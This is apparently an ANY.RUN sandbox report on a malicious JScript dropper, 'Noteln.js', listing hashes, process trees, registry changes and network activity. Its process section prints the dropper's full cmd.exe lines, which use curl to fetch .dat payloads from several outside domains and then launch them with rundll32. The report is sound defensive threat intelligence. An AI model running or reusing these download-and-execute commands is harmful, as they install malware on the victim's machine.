File name:

Noteln.js

Full analysis: https://app.any.run/tasks/a1cbc642-ad92-470e-9afe-0027f89448c0
Verdict: Malicious activity
Analysis date: December 14, 2023, 07:21:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

4F73F4125B026884A735E4711536571E

SHA1:

82BC49D2D89A7E64B51B709D8B15479C7BA0058E

SHA256:

BC6E73CD5DB5AD921DD0C7863F128A6A0557254A3EC8C710D11A81163407C5FB

SSDEEP:

768:Qi2aw1S3WuGscAWQxFferTAnqMooiBGXkI+DNLrAtUf+TPLYPw1fJs6pMonyTAZH:Qixw15SQ/RLm/Pi10/vxXD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual connection from system programs

      • wscript.exe (PID: 1164)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1164)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 2748)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 2748)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1164)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 1164)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1000"C:\Windows\System32\cmd.exe" /c mkdir C:\Hfgthdrhrdss\Brgsrhdhtfer & curl 0.7123928972193194.dat --output C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXXC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1164"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Noteln.js"C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1308"C:\Windows\System32\cmd.exe" /c mkdir C:\Hfgthdrhrdss\Brgsrhdhtfer & curl https://orionparti.com/QX6Lr/0.5754184624632603.dat --output C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXXC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1760"C:\Windows\System32\cmd.exe" /c mkdir C:\Hfgthdrhrdss\Brgsrhdhtfer & curl 0.18280690253510906.dat --output C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXXC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1796"C:\Windows\System32\cmd.exe" /c mkdir C:\Hfgthdrhrdss\Brgsrhdhtfer & curl https://limperus.com/7AhkO/0.8429680955625443.dat --output C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXXC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2420timeout 10 C:\Windows\System32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2512"C:\Windows\System32\cmd.exe" /c mkdir C:\Hfgthdrhrdss\Brgsrhdhtfer & curl https://fertelion.com/mWF/0.5416637748183657.dat --output C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXXC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2748"C:\Windows\System32\cmd.exe" /c timeout 10 & rundll32 C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXX,EnterC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2940rundll32 C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXX,EnterC:\Windows\System32\rundll32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
3020"C:\Windows\System32\cmd.exe" /c mkdir C:\Hfgthdrhrdss\Brgsrhdhtfer & curl 0.87748928810734.dat --output C:\Hfgthdrhrdss\Brgsrhdhtfer\Urhyhdhthfse.OOOOOCCCCCXXXXXC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
1 337
Read events
1 315
Write events
22
Delete events
0

Modification events

(PID) Process:(1164) wscript.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1164) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1164) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1164) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1164) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
6
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
1164wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:AC05D27423A85ADC1622C714F2CB6184
SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
1164wscript.exeC:\Users\admin\AppData\Local\Temp\CabBE59.tmpcompressed
MD5:AC05D27423A85ADC1622C714F2CB6184
SHA256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
1164wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8555326CC9661C9937DC5053B6C38763binary
MD5:531F8696996F1B4FA1C366E6E994A27F
SHA256:8C32E41C63AA9B2FA5B5A9FC78597FE64C4B1DEC0217722357EEA3CAE509FC05
1164wscript.exeC:\Users\admin\AppData\Local\Temp\TarBE5A.tmpcat
MD5:9C0C641C06238516F27941AA1166D427
SHA256:4276AF3669A141A59388BC56A87F6614D9A9BDDDF560636C264219A7EB11256F
1164wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:09F9A6789040942538E3F998275D72BA
SHA256:9F0A2BB6865C40346CC92DAEFFC1497AD5F48537E04A845F6DE8E2465AC2A9F1
1164wscript.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8555326CC9661C9937DC5053B6C38763binary
MD5:866912C070F1ECACACC2D5BCA55BA129
SHA256:85666A562EE0BE5CE925C1D8890A6F76A87EC16D4D7D5F29EA7419CF20123B69
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1164
wscript.exe
GET
200
23.53.40.26:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?af51a090902a2d02
unknown
compressed
65.2 Kb
unknown
1164
wscript.exe
GET
200
54.81.30.52:80
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
unknown
binary
1.47 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1956
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
324
svchost.exe
224.0.0.252:5355
unknown
1164
wscript.exe
23.53.40.26:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown
1164
wscript.exe
54.81.30.52:80
www.ssl.com
AMAZON-AES
US
unknown

DNS requests

Domain
IP
Reputation
ctldl.windowsupdate.com
  • 23.53.40.26
  • 23.53.40.25
  • 23.53.40.83
  • 23.53.40.81
  • 23.53.40.19
  • 23.53.40.16
  • 23.53.40.9
  • 23.53.40.82
  • 23.53.40.75
whitelisted
www.ssl.com
  • 54.81.30.52
  • 54.157.44.142
unknown

Threats

No threats detected
No debug info